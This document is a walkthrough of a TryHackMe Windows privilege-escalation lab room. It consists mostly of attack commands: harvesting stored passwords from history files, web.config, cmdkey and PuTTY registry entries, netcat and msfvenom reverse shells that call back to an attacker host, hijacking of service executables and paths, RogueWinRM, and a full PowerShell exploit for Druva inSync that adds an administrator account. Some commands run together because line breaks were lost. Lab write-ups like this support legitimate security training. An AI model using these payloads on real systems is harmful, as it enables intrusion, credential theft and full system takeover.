Windows Privilege Escalation
Room Link: https://tryhackme.com/room/windowsprivesc20
Harvesting Passwords from Usual Spots
A password for the julia.jones user has been left on the Powershell history. What is the password?
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Victim(cmd)
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Victim(cmd)
cmdkey /list
runas /savecred /user:WPRIVESC1\mike.katz cmd.exe
Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Other Quick Wins
What is the taskusr1 flag?
Victim(cmd)
schtasks /query /tn vulntask /fo list /v
Victim(cmd)
icacls c:\tasks\schtask.batVictim(cmd)
icacls c:\tasks\schtask.bat
Kali
nc -lvnp 4444Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask
Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsScheduler
Victim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exeOnce the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:FKali
nc -lvp 4445Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
sc stop windowsscheduler
sc start windowsschedulerOR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
Unquoted Service Paths
Victim(cmd)
sc qc "disk sorter enterprise"
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:FKali
nc -lvp 4446Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
Insecure Service Permissions
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exeKali
nc -lvp 4447Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
Abusing dangerous privileges
Kali
nc -lvp 4442Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
Abusing vulnerable software
Case Study: Druva inSync 6.6.3
Druva_inSync_exploit.ps1
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)Victim
cd C:\tools\
.\Druva_inSync_exploit.ps1
Victim(Powershell)
runas /user:pwned "C:\Windows\system32\cmd.exe"
Enter the password for pwnd: SimplePass123Victim(cmd)
powershell.exe -Command "Start-Process cmd "/k cd /d %cd%" -Verb RunAs"
Last updated